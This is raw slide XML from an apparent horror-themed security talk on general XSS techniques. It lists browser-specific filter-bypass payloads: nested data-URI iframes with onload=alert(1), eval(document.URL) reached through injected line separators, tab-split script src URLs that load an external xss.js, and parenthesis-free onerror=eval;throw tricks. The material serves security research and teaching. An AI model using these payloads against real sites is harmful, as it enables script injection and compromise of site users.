                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inherit origins on Firefox </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nested </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can mix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>urlencoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and HTML entities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data:text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>html,&amp;lt;iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data:text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/html,%26lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt;'&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</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General XSS techniques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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLs look like JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://someurl.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(label) (comment)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE treats it as valid JavaScript </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Valid JavaScript in IE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If we can inject new lines then we can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a URL! </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General XSS techniques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a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE supports both new lines and line/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>para</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> separators within the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Chrome supports line/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>para</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> separator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> encodes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>location.hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=‘\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>nalert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(1)’;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(document.URL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>location.hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=‘\u2028alert(1)’;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>(document.URL)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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General XSS techniques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a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> support new lines/carriage returns and tab between slashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“/&amp;Tab;/businessinfo.co.uk/labs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/xss.js”&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fool external </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> checks with tabs and new lines</a:t>
            </a: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General XSS techniques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
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Window </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can be used for XSS without ( or )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert;throw”XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firefox prefixes with two words </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Chrome uses only one </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>eval;throw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>’=alert\x281\x29’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="-1971600"/>
            <a:ext cx="6981825" cy="4924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848"/>
            <a:ext cx="8229600" cy="2304256"/>
          </a:xfrm>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THE end</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>questions?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Horror FILMS ARE LIKE SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="-2259632"/>
            <a:ext cx="6981825" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7" descr="zombie.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="836878">
            <a:off x="583456" y="2508798"/>
            <a:ext cx="3050557" cy="4322294"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="iknowwhat.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1524795">
            <a:off x="2059327" y="2883148"/>
            <a:ext cx="2730882" cy="4045279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="iknowwhat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1865569">
            <a:off x="4142959" y="4008071"/>
            <a:ext cx="2720605" cy="2720605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="iknowwhat3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381750" y="2348880"/>
            <a:ext cx="2762250" cy="3829050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
